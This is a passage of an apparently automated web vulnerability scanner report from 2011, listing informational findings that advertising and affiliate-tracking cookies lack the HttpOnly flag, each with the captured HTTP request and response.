Set-Cookie: GUID=MTMwMzYxNDUxMjsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Tue, 23-Apr-2013 03:08:32 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 24 Apr 2011 04:08:32 GMT
Content-Length: 0


14.46. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20016;evt=13529;cat1=13666;cat2=15184 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=728800512746; lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; pluto=728800512746

Response

HTTP/1.1 302 Redirect
Date: Sun, 24 Apr 2011 03:08:32 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=RSh3CL6z3gEQmpS17AM&amp;guid=ON&amp;script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BAAAAARUu69NACAAATxgIASgAAXhVAAAj7qAFwFmUKAUIAAGizcAAGuRs2AvATBOIBCgAAFQO6AIIADgBRcBAAA=; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT
Set-Cookie: pluto=728800512746; domain=.fastclick.net; path=/; expires=Tue, 23-Apr-2013 03:08:32 GMT


14.47. http://partners.nextadnetwork.com/z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:10:06 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:10:06 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:06 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:06 GMT; path=/; domain=.directtrack.com
Location: http://www.kqzyfj.com/click-1911961-10751987?sid=gid9a identity theft resource_ordering34--2011-04-23--20-10-04CD1&url=https%3A%2F%2Fwww.econsumer.equifax.com%2Fconsumer%2Flanding.ehtml%3F%255estart%3D%26companyName%3Dcj_esnp3r
X-Server-Name: www@dc1dtweb16
Content-Length: 0
Content-Type: text/html


14.48. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/371/CD1/id4+106163471 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:50 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb107
Content-Length: 477
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 106163471CD1&c2=CD1">
<script type="text/javascript">function redirect() {if(doc
...[SNIP]...

14.49. http://partners.nextadnetwork.com/z/48/CD1/945440258

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/48/CD1/945440258

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/48/CD1/945440258 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:09:57 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:57 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:57 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:57 GMT; path=/; domain=.directtrack.com
Location: https://secure.lifelock.com/enrollmentform.aspx?promocode=next&uid=945440258CD1
X-Server-Name: www@dc1dtweb168
Content-Length: 0
Content-Type: text/html


14.50. http://partners.nextadnetwork.com/z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:10:02 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:10:02 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:02 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:10:02 GMT; path=/; domain=.directtrack.com
Location: http://www.nextadvisor.com/pmid?kw=id gid9a identity theft resource_ordering34--2011-04-23--20-10-01CD1
X-Server-Name: www@dc1dtweb59
Content-Length: 0
Content-Type: text/html


14.51. http://partners.nextadnetwork.com/z/518/CD1/idf+903230053

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/518/CD1/idf+903230053

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /z/518/CD1/idf+903230053 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 03:09:53 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:53 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:53 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:53 GMT; path=/; domain=.directtrack.com
Location: http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A?cust=idf 903230053CD1
X-Server-Name: www@dc1dtweb168
Content-Length: 0
Content-Type: text/html


14.52. http://pixel.mathtag.com/event/img

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /event/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event/img?mt_id=102119&mt_adid=100377&v1=&v2=&v3=&s1=&s2=&s3=&ord=503629049 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303614126

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6317 25367
Cache-Control: no-cache
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 24 Apr 2011 03:08:32 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1303614512; domain=.mathtag.com; path=/; expires=Mon, 23-Apr-2012 03:08:32 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

14.53. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6073&nid=2100&expires=30&put=usr3fd49cb9a7122f52 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses5=12142^1; ses15=9346^1; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; ses2=12801^1&12142^1; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C0%2C1%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C0%2C1%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C0%2C1%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fd49cb9a7122f52; expires=Tue, 24-May-2011 03:10:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.54. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BoQkz2kAAAAABq5CAEAAgEABAAAABAAAAIAAgEA; BASE=RgwqvyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nmI!; ROLL=boAnu2y6iNBg1C4LhynzuD54K75V4u/oBlRpVwKMMqbw4GP5fRga2X2wn3+EsmF!; C2=1V5sN5pqHIxFG7povgg3sY8QSKMCItdhvhQ3WX4bIMa4F+GCKGehvhQ3gZ4b1qKCaMrxDV7qIEysG+WkBgAoNXAcxOCCsRpBwB; GUID=MTMwMzYxNDgzNzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 12:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.801362.0XMC
Set-Cookie: C2=MMBtN5pqHIxFGQoovgg3sYQKSKMCItdxUhQ3WXMVIMa4FTFCKGexUhQ3gZMV1qKCaMrBpU7qIEysGTVkBgAoNXUVmZOiGgasjgAbUaUVNSPC73cBwB; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: F1=BwwE02kAAAAABq5CAEAAEBABAAAABAAAAMAAEBA; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: ROLL=boAnv2y2JFBgWE4zf7nzuD5wX65V4u/meZRpXwKuwebwa4PtYFhaQQG!; domain=advertising.com; expires=Tue, 23-Apr-2013 12:09:48 GMT; path=/
Set-Cookie: 53765754=_4db4130c,4224517685,801362^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 24 Apr 2011 12:09:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 657

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000801362/mnum=0000894
...[SNIP]...

14.55. http://roia.biz/im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A

Summary

Severity:   Information
Confidence:   Certain
Host:   http://roia.biz
Path:   /im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A?cust=SUZE%20gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-09-59CD1 HTTP/1.1
Host: roia.biz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roia1066=1BNctFRX773iepE2VRhbwPOSVgDrhBAAGKcXhpZGYgOTAzMjMwMDUzQ0QxAEQJKbMxVQAAhsNJrcHW800AAPyeczIxMwBDAAAFcEIAAKxFTwAABCo

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 24 Apr 2011 03:10:01 GMT
Content-Type: text/plain
Connection: close
P3P: policyref="http://roia.biz/w3c/p3p.xml", CP="NOI DSP COR CURa OUR BUS NAV STA"
Set-Cookie: roia1066=1Bu97lXL1iQIPMiKI4F1LVeE8263ZBAAGKcXhTVVpFIGdpZDlhIGlkZW50aXR5IHRoZWZ0IHJlc291cmNlX29yZGVyaW5nMzQtLTIwMTEtMDQtMjMtLTIwLTA5LTU5Q0QxAEQJKbM4VQAAiOpJrcHW800AAPyeczIxMwBDAAAFcEIAAK6_TwAABCo; path=/im; expires=Mon, 23-Apr-2012 03:10:01 GMT
Pragma: no-cache
Cache-control: no-cache
Location: https://www.trustedid.com/suzeidprotector/?promoRefCode=NXDIRSUZIDPANN
Content-Length: 0
Expires: Sun, 24 Apr 2011 03:10:01 GMT


14.56. http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A

Summary

Severity:   Information
Confidence:   Certain
Host:   http://roia.biz
Path:   /im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

roia1066

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A?cust=idf%20903230053CD1 HTTP/1.1
Host: roia.biz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sun, 24 Apr 2011 03:09:54 GMT
Content-Type: text/plain
Connection: close
P3P: policyref="http://roia.biz/w3c/p3p.xml", CP="NOI DSP COR CURa OUR BUS NAV STA"
Set-Cookie: roia1066=1BNctFRX773iepE2VRhbwPOSVgDrhBAAGKcXhpZGYgOTAzMjMwMDUzQ0QxAEQJKbMxVQAAhsNJrcHW800AAPyeczIxMwBDAAAFcEIAAKxFTwAABCo; path=/im; expires=Mon, 23-Apr-2012 03:09:54 GMT
Pragma: no-cache
Cache-control: no-cache
Location: https://www.trustedid.com/idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15
Content-Length: 0
Expires: Sun, 24 Apr 2011 03:09:54 GMT


14.57. http://sales.liveperson.net/hc/71003277/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/71003277/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickSiteContainerID_71003277
LivePersonID

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/71003277/?&site=71003277&cmd=mTagStartPage&lpCallId=565276490757-576158150099&protV=20&lpjson=1&page=http%3A//www.hotelclub.com/ManageBooking.asp&id=1034388051&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-hotelclub-chat-en&activePlugin=none&cobrowse=true&PV%21unit=hotelclub-chat&PV%21visitorActive=1&SV%21language=en&title=View/Cancel%20Your%20Booking&referrer=http%3A//www.hotelclub.com/&cookie=HTC%3DAppVer%3D1%252E0%3B%20anon%3D1129876971252011042422094%3B%20ASPSESSIONIDCCQRQCTQ%3DFDCOCPBANKNGOIFKLDNNOFAM%3B%20s_vi%3D%5BCS%5Dv1%7C26DA09858516231B-400001A4A00530FD%5BCE%5D%3B%20WT_FPC%3Did%3D173.193.214.243-2165807168.30147192%3Alv%3D1303643486711%3Ass%3D1303643390479%3B%20s_cc%3Dtrue%3B%20s_lp%3Dno%3B%20s_sq%3D%255B%255BB%255D%255D HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5427601522506632860; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303647088962

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:11:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_71003277=STANDALONE; path=/hc/71003277
